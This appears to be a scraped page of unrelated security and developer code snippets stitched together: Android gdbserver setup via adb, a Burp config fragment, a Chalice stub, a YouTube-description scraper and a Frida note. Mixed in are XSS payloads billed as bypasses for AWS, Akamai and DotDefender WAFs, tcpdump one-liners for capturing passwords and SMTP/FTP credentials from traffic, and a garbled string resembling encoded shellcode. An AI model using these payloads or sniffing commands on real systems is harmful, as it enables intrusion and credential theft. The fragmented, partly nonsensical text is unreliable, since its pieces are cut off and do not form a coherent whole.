adb push ~/android-sdk-linux/ndk-bundle/prebuilt/android-<arch>/gdbserver/gdbserver /data/local/tmp
adb shell "chmod 777 /data/local/tmp/gdbserver"
adb shell "ls -l /data/local/tmp/gdbserver"
adb forward tcp:1337 tcp:1337
| { | |
| "project_options":{ | |
| "connections":{ | |
| "hostname_resolution":[], | |
| "out_of_scope_requests":{ | |
| "advanced_mode":false, | |
| "drop_all_out_of_scope":false, | |
| "exclude":[], | |
| "include":[], | |
| "scope_option":"suite" |
| ┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ | |
| ┇ A bug is never just a mistake. ┇ | |
| ┇ It represents something bigger. An error ┇ | |
| ┇ of thinking that makes you who you are. ┇ | |
| ┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛ |
| from chalice import Chalice, Response | |
| from pdf2image import convert_from_bytes | |
| import os | |
| from io import BytesIO | |
| app = Chalice(app_name='pdf2image') | |
| @app.route('/') | |
| def index(): |
adb push ~/android-sdk-linux/ndk-bundle/prebuilt/android-<arch>/gdbserver/gdbserver /data/local/tmp
adb shell "chmod 777 /data/local/tmp/gdbserver"
adb shell "ls -l /data/local/tmp/gdbserver"
adb forward tcp:1337 tcp:1337
| #!/usr/bin/env python3 | |
| """ | |
| Script used to pull down the current video descriptions from ippsec's youtube channel. | |
| The raw output still has a few HTML tags that need to be manually removed and there | |
| also seem to be multiple duplicates of videos that have been removed in the output | |
| saved as ippsec-details.txt | |
| """ | |
| import re | |
| import sys |
| @vanshitmalhotra | Bypass AWS WAF -// | |
| Add "<!" (without quotes) before your payload and bypass that WAF. :) | |
| eg: <!<script>confirm(1)</script> | |
| @black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc | |
| <img sr%00c=x o%00nerror=((pro%00mpt(1)))> | |
| DotDefender WAF bypass by @0xInfection | |
| <bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme |
| 5 c at 5 b at jut Yet At At At At At At At At At At At At Pt Pt jut jut jut jut Qt jut at 111 1 t t t t t t t t t t t t t t t t Pt Pt Pt Pt jut j j j j at Bet At j Qt Rt St j j j j at 4 Kt Qt Qt Rt St j j Pt j at 311 1 t t 321 1 111 1 Bet Bet At t Qt Yet u h a a a a Q X 4 y P Y I I I I I I I I I I I I I I I I I 7 Q Z j A X P 0 A 0 A k A A Q 2 A B 2 B B 0 B B A B X P 8 A B u J I 4 q Y P M I F 0 u 8 V O v O 3 C 5 8 U 8 T o P b b I 2 N l I i s R p q C K 9 y q N P d K z m m P A A X X X X X X X X X X X X X |
I figured that I would write down my findings somewhere since this is my first time using Frida. This won't cover installing frida, adb, apktool because these are well covered in other sources.
Capture SMTP Email
tcpdump -nn -l port 25 | grep -i 'MAIL FROM\|RCPT TO'
Extract HTTP Passwords in POST Requests
tcpdump -s 0 -A -n -l | egrep -i "POST /|pwd=|passwd=|password=|Host:"
Capture FTP Credentials and Commands
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|